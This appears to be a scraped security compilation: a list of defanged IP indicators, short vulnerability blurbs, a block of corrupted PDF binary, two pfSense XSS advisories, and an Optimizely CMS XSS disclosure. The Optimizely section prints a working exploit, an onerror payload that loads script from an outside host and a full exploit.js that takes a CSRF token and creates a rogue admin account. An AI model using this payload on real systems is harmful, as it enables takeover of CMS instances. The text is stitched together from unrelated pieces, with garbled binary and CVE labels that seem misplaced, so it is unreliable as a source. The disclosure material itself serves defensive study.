195\[.\]242\[.\]110\[.\]30  
195\[.\]242\[.\]110\[.\]32  
195\[.\]242\[.\]110\[.\]33  
195\[.\]242\[.\]110\[.\]34  
195\[.\]242\[.\]110\[.\]37  
195\[.\]242\[.\]110\[.\]40  
195\[.\]242\[.\]110\[.\]41  
195\[.\]242\[.\]110\[.\]46  
195\[.\]242\[.\]110\[.\]58  
195\[.\]242\[.\]110\[.\]59

195\[.\]242\[.\]110\[.\]60  
195\[.\]242\[.\]110\[.\]72  
195\[.\]242\[.\]110\[.\]73  
195\[.\]242\[.\]110\[.\]77  
195\[.\]242\[.\]110\[.\]79  
195\[.\]242\[.\]110\[.\]80  
195\[.\]242\[.\]110\[.\]83  
195\[.\]242\[.\]110\[.\]84  
195\[.\]242\[.\]110\[.\]87  
195\[.\]242\[.\]110\[.\]95  
195\[.\]242\[.\]110\[.\]99  
195\[.\]242\[.\]111\[.\]102  
195\[.\]242\[.\]111\[.\]11  
195\[.\]242\[.\]111\[.\]117  
195\[.\]242\[.\]111\[.\]12  
195\[.\]242\[.\]111\[.\]120  
195\[.\]242\[.\]111\[.\]147  
195\[.\]242\[.\]111\[.\]148  
195\[.\]242\[.\]111\[.\]152  
195\[.\]242\[.\]111\[.\]214  
195\[.\]242\[.\]111\[.\]215  
195\[.\]242\[.\]111\[.\]217  
195\[.\]242\[.\]111\[.\]224  
195\[.\]242\[.\]111\[.\]25  
195\[.\]242\[.\]111\[.\]29  
195\[.\]242\[.\]111\[.\]36  
195\[.\]242\[.\]111\[.\]37  
195\[.\]242\[.\]111\[.\]38  
195\[.\]242\[.\]111\[.\]40  
195\[.\]242\[.\]111\[.\]42  
195\[.\]242\[.\]111\[.\]44  
195\[.\]242\[.\]111\[.\]49  
195\[.\]242\[.\]111\[.\]50  
195\[.\]242\[.\]111\[.\]53  
195\[.\]242\[.\]111\[.\]56  
195\[.\]242\[.\]111\[.\]57  
195\[.\]242\[.\]111\[.\]58  
195\[.\]242\[.\]111\[.\]59  
195\[.\]242\[.\]111\[.\]6  
195\[.\]242\[.\]111\[.\]7  
195\[.\]242\[.\]111\[.\]76  
195\[.\]242\[.\]111\[.\]77  
195\[.\]242\[.\]111\[.\]84  
195\[.\]242\[.\]111\[.\]85  
195\[.\]242\[.\]111\[.\]86  
195\[.\]242\[.\]111\[.\]87  
195\[.\]242\[.\]111\[.\]94  
195\[.\]242\[.\]111\[.\]95  
195\[.\]242\[.\]111\[.\]96  
45\[.\]88\[.\]3\[.\]114  
45\[.\]88\[.\]3\[.\]12  
45\[.\]88\[.\]3\[.\]122  

45\[.\]88\[.\]3\[.\]123  
45\[.\]88\[.\]3\[.\]134  
45\[.\]88\[.\]3\[.\]138  
45\[.\]88\[.\]3\[.\]139  
45\[.\]88\[.\]3\[.\]141  
45\[.\]88\[.\]3\[.\]142  
45\[.\]88\[.\]3\[.\]144  
45\[.\]88\[.\]3\[.\]145  
45\[.\]88\[.\]3\[.\]146  
45\[.\]88\[.\]3\[.\]148  
45\[.\]88\[.\]3\[.\]149  
45\[.\]88\[.\]3\[.\]154  
45\[.\]88\[.\]3\[.\]167  
45\[.\]88\[.\]3\[.\]170  
45\[.\]88\[.\]3\[.\]201  
45\[.\]88\[.\]3\[.\]21  
45\[.\]88\[.\]3\[.\]213  
45\[.\]88\[.\]3\[.\]218  
45\[.\]88\[.\]3\[.\]219  
45\[.\]88\[.\]3\[.\]225  
45\[.\]88\[.\]3\[.\]227  
45\[.\]88\[.\]3\[.\]23  
45\[.\]88\[.\]3\[.\]235  
45\[.\]88\[.\]3\[.\]237  
45\[.\]88\[.\]3\[.\]238  
45\[.\]88\[.\]3\[.\]239  
45\[.\]88\[.\]3\[.\]240  
45\[.\]88\[.\]3\[.\]244  
45\[.\]88\[.\]3\[.\]245  
45\[.\]88\[.\]3\[.\]248  
45\[.\]88\[.\]3\[.\]25  
45\[.\]88\[.\]3\[.\]251  
45\[.\]88\[.\]3\[.\]253  
45\[.\]88\[.\]3\[.\]34  
45\[.\]88\[.\]3\[.\]35  
45\[.\]88\[.\]3\[.\]40  
45\[.\]88\[.\]3\[.\]49  
45\[.\]88\[.\]3\[.\]52  
45\[.\]88\[.\]3\[.\]60  
45\[.\]88\[.\]3\[.\]61  
45\[.\]88\[.\]3\[.\]63  
45\[.\]88\[.\]3\[.\]70  
45\[.\]88\[.\]3\[.\]78  
45\[.\]88\[.\]3\[.\]79  
45\[.\]88\[.\]3\[.\]81  
45\[.\]88\[.\]3\[.\]82  
45\[.\]88\[.\]3\[.\]83  
45\[.\]88\[.\]3\[.\]85  
45\[.\]88\[.\]3\[.\]95  
45\[.\]88\[.\]3\[.\]98

 Credit card skimming on the rise for the holiday shopping season 

A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1). There is a stored cross-site scripting vulnerability in the Administration Console of the affected product, that could allow an attacker with high privileges to inject Javascript code into the application that is later executed by another legitimate user.

%PDF-1.5 %���� 56 0 obj << /Length 2978 /Filter /FlateDecode >> stream xڵZKs�F��W��ʄ��p�E�e���)�Rv4I��(U��v�H��=�@OwOw\_ψ�d�������{�6�����q�Il�hkcI�\`��E�,\]��|8b�D�t�� GTFY��I^�|��Da�ǐ�k��m�����������/W����^QP��QkN��շ�� �g�H̭��7W!y,���\`z��+�\*�5�h��\*&�u�4"�ZD:�h�c+��:Hژ\*4� �,�oO �RƔ��\\�D���U 6֔��cڭ? ��� ��/�l�LO�g�ł��ΡZ�gT�F���ӥ>�\*�Ν�����u���ȖY����%��\\�^b E��}D�ی�\]�p\*@��\[��\[g\*f�%�#�\_�X\*ީ8�j,�trw3��ѓq���^f��1S�VԣRuZ�$�u������c��%�F!�ze/�1��D#{��EsQC�E�+��x��d�� �S��G��@�ٵTaYL�U���phϠѝ�# Q�(<"�N�&�4Pu$�� T�,��

CVE-2023-46099

Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted url to the status_logs_filter_dynamic.php page.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-23\_09.webgui Security Advisory pfSense Topic: XSS vulnerability in the WebGUI Category: pfSense Base System Module: webgui Announced: 2023-10-31 Credits: Oskar Zeino-Mahmalat (Sonar) CVE ID: CVE-2023-42325 Affects: pfSense Plus software versions <= 23.05.1 pfSense CE software versions <= 2.7.0 Corrected: 2023-07-05 18:51:06 UTC (pfSense Plus master, 23.09) 2023-07-05 18:51:06 UTC (pfSense CE master, 2.8.0) 0. Revision History v1.0 2023-10-31 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential Cross-Site Scripting (XSS) vulnerability was found in status\_logs\_filter\_dynamic.php, a component of the pfSense Plus and pfSense CE software GUI. The page does not always validate or sanitize the value of the "interface" variable from user input when using RAW mode ("filtersubmit=1"), which then may be printed without encoding inside a block of JavaScript code. This problem is present on pfSense Plus version 23.05.1, pfSense CE version 2.7.0, and earlier versions of both. III. Impact Due to the lack of proper encoding on the affected parameters susceptible to XSS, arbitrary JavaScript could be executed in the user's browser. The user's session cookie or other information from the session may be compromised. The user must be logged in and have sufficient privileges to access status\_logs\_filter\_dynamic.php. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. \* Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 23.09 or later, or a pfSense CE software version after 2.7.0, when one is available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 23.05.1 and pfSense CE version 2.7.0 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master f387c974a9a597bf01ab86ec049cca186a1e050c pfSense/master f387c974a9a597bf01ab86ec049cca186a1e050c - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmU/wRcACgkQE7mH/ZIU +NotvRAAobKxH11HjFKUNdAUA6rqv9BcRqgYWNVTVQSDM/Wmf4lw2mAvldMaaSOc KodEYJ6LWf1kZGu7VN36q59l7gn9/H42PeBNU7cNDJZaNXZd3LUG2bqRn4f8AuJA jUvPzE3w7DHcxrgHIn/3S8WI5WSVDgemzL4d6HlbzJtJ1mdF1viWkJZY6EqKRPgR Mw1adsPZyiAf7AalNRA7IJjPYTyUMxC2YSiMz2goeWd+6Zfkul9sbciTXCQwFAXO ZelZZm+arYtutXpeCJPmX3SvVcaT+f87anql20Xlijkuexr8aoMuSHOX8MYWMapY ndoNZZusoq2pUSK4VAPnhBIqtD6M7izC+bcWUBRea3h3/IiXjhPDtUtr4ONZQ3fQ HGf8ZEHd2EswpNhYbKz5cdMm37Q3JhRzVYMXFvNjsjOliF0ZyEibnO5L7W51Jujk yRu5fIli6UlfhcLD2iTOdnDnxSzxl4QiBAD0/XMVl3OQoy1R4AoFS9VtGi+EteB9 SykmgjmgIBjxSQvEyt30olt9XbVvDbi1EQDmJz6hd14P1Sy03BMn1BZoU5heN9Xc t3gdQMS01rB+EqGenXDnKvIKQ3LAb1AqNvYzn1BSrMno6YGCgSVEKw6vPEbEoI7r AX6MEZeetdwzHIEws9UEp8XYt6Q1hSmnNCJU8pfpAsuaum3SGo0= =W5mP -----END PGP SIGNATURE-----

CVE-2023-42325

Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted URL to the getserviceproviders.php page.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-23\_08.webgui Security Advisory pfSense Topic: XSS vulnerability in the WebGUI Category: pfSense Base System Module: webgui Announced: 2023-10-31 Credits: Oskar Zeino-Mahmalat (Sonar) CVE ID: CVE-2023-42327 Affects: pfSense Plus software versions <= 23.05.1 pfSense CE software versions <= 2.7.0 Corrected: 2023-07-05 17:43:56 UTC (pfSense Plus master, 23.09) 2023-07-05 17:43:56 UTC (pfSense CE master, 2.8.0) 0. Revision History v1.0 2023-10-31 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential Cross-Site Scripting (XSS) vulnerability was found in getserviceproviders.php, a component of the pfSense Plus and pfSense CE software GUI. The page does not always validate or sanitize the value of the "connection" variable from user input, which then may be displayed without encoding. This problem is present on pfSense Plus version 23.05.1, pfSense CE version 2.7.0, and earlier versions of both. III. Impact Due to the lack of proper encoding on the affected parameters susceptible to XSS, arbitrary JavaScript could be executed in the user's browser. The user's session cookie or other information from the session may be compromised. The user must be logged in and have sufficient privileges to access getserviceproviders.php. The affected case requires a provider to only have one plan. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. \* Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 23.09 or later, or a pfSense CE software version after 2.7.0, when one is available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 23.05.1 and pfSense CE version 2.7.0 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master 543dc9253d6ab0e755ee043da2217d996a28ab5e pfSense/master 543dc9253d6ab0e755ee043da2217d996a28ab5e - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmU/wPoACgkQE7mH/ZIU +Nq8KA//YY1io7ZIDo//w4I3v+j25c83Yx40K20I+Zal8cyPflwqG6fF/DJRCEfv R0CWRZP6aPEfxVsWfLhoDktEm6yNcn0WR6MSVTbKOnyfJfb7Dp/tznkzZhSUqQ7v rt0bBMSdoQTn6gZIAD7TLVCmh9RfcYAXDWGiHUNC5d6kvy8Eoe7/+cjZUOSbvg/a EV0EgKqZoWFkwZWWLrbtNKyMBpIA1sgUKeVAPwnFMJ20QRPrafdNJircOU0S0vR5 1zAs6JMKgARL5ytzPxlndtKtwe1sVmxkYeGUb6C7b6mLnPckCFMGaAZYYnrK2V3f YbqK66/ZURgdmGcLAy305/oNwZy3JmpVS2FNgS3ZrBlwYXlYnxFkrEzi4SMFNtVP RltNabwM75bq/9tWqDm/nitHwmEgkm3wKdtXue2TGfNEulsmb+TeH7hGXJzuxStm 0lx+oQDmLL9jToPx4aHWMSXSCJe3wKk4uxpe6TTD9hnOB+TEln4sjmS5/MDlAYP8 zh8vkwKUag3gIPulsnmRFNrIPw49ezoWg4ZdVzadpw7zwS6Iar/oK4xEVIb6abWz kYAmB85iOuvqeZzVbiRNl8bb06h/ci9hXmsInuWwV8BfXtR1bl/xJ2n0j1AXnQPW yn27vmU9UmFodHjNfRATNzNGVL4vZoXDnvaeDMgRBwa5Dobslig= =9dZ6 -----END PGP SIGNATURE-----

CVE-2023-42327

Optimizely CMS UI before v12.16.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Admin panel.

**Description**

The Optimizely admin interface was vulnerable to DOM-based cross-site scripting (XSS), which could allow an attacker to execute malicious Javascript code in a legitimate user's browser. 

Optimizely CMS is a widely used content management system that allows users to create and manage digital content. The CMS was previously called Episerver.

**Impact**

WithSecure weaponized the XSS to automatically create an attacker-controlled admin user in Optimizely as a proof of concept. This could be used in conjunction with, for example, phishing to take control of Optimizely instances.

**Proof of concept**

The Optimizely admin panel utilized JavaScript to fetch and display content. The frontend looked at the content in the URL fragment and attempted to fetch the requested content. If the fetch failed, such as when the content did not exist, a dialogue would be displayed with an error message. The way this error message was displayed to the user left the application vulnerable to XSS. An example error can be viewed in the  screenshot below:

The error message is displayed to the user by setting the innerHTML attribute on an element with the message content. The attacker-controlled input in this message is not sanitized or validated before the assignment. This allows an attacker to control the HTML content of the element. As an example, by visiting the following URL:

http://172.20.0.3/EPiServer/CMS/#context=epi.cms.contentdata:///%3Cimg%20src=x%20onerror=alert(%22xss%22)%3E

An alert popup in the user's browser (provided they are signed in to Optimizely) will be displayed, indicating that it is possible to execute arbitrary JavaScript:

Below is a debugging session where the attacker-controlled input reaches the vulnerable sink in widgets.js:

In the above screenshot, the contents of the variable _**\_5c1**_ is printed in the browser console. The content is an error message meant to be displayed to the user, saying that the requested URL could not be loaded followed by the attacker provided data. 

WithSecure weaponized the XSS to automatically add a new admin user to Optimizely when a link was clicked:

http://172.20.0.3/EPiServer/cms#context=epi.cms.contentdata:///%3Cimg%20src=x%20onerror=%22document.write('%3Cscript%20src=\\'http://192.168.84.168:8000/exploit.js\\'%3E%3C/script%3E')%22%3E

The URL-decoded payload can be viewed below:

<img src=x onerror="document.write('<script src=\\'http://192.168.84.168:8000/exploit.js\\'></script>')">

Since the user provided input reaches an innerHTML sink, regular  <script> tags cannot be used to execute Javascript. Instead, an image tag with an  onerror attribute is used to write a script tag to the DOM. The browser would then load  additional attacker-controlled Javascript from  http://192.168.84.168:8000/exploit.js. In a real-world scenario, this would be a host on the Internet instead of an internal host. The contents of exploit.js:

fetch('http://172.20.0.3/EPiServer/EPiServer.Cms.UI.Admin/default', { 'credentials': 'include' }).then(response => response.text()).then(data => data.match(/value="(.\*)\\"/)\[1\]).then(token => { json={"username":"hacker","email":"hacker@hack.hack","isChangePassword":true,"password":"Password1!","confirmPassword":"Password1!","currentPassword":"","passwordAnswer":"","language":null,"touchSupport":false,"headlessModeEnabled":false,"roles":\["WebAdmins"\],"isApproved":true,"isLockedOut":false};fetch('http://172.20.0.3/EPiServer/EPiServer.Cms.UI.Admin/users/Create',{'credentials':'include','body':JSON.stringify(json),'method':'POST',headers:{'Content-Type':'application/json','RequestVerificationToken':token}})})

The above script adds a user called hacker with a pre-set password as a web admin in Optimizely. An attacker would need to trick a user into clicking a malicious link that triggers the XSS vulnerability, and if the user is signed in to Optimizely, an attacker-controlled admin account would be created. The attacker can subsequently sign in to Optimizely using the account.

Tag

#java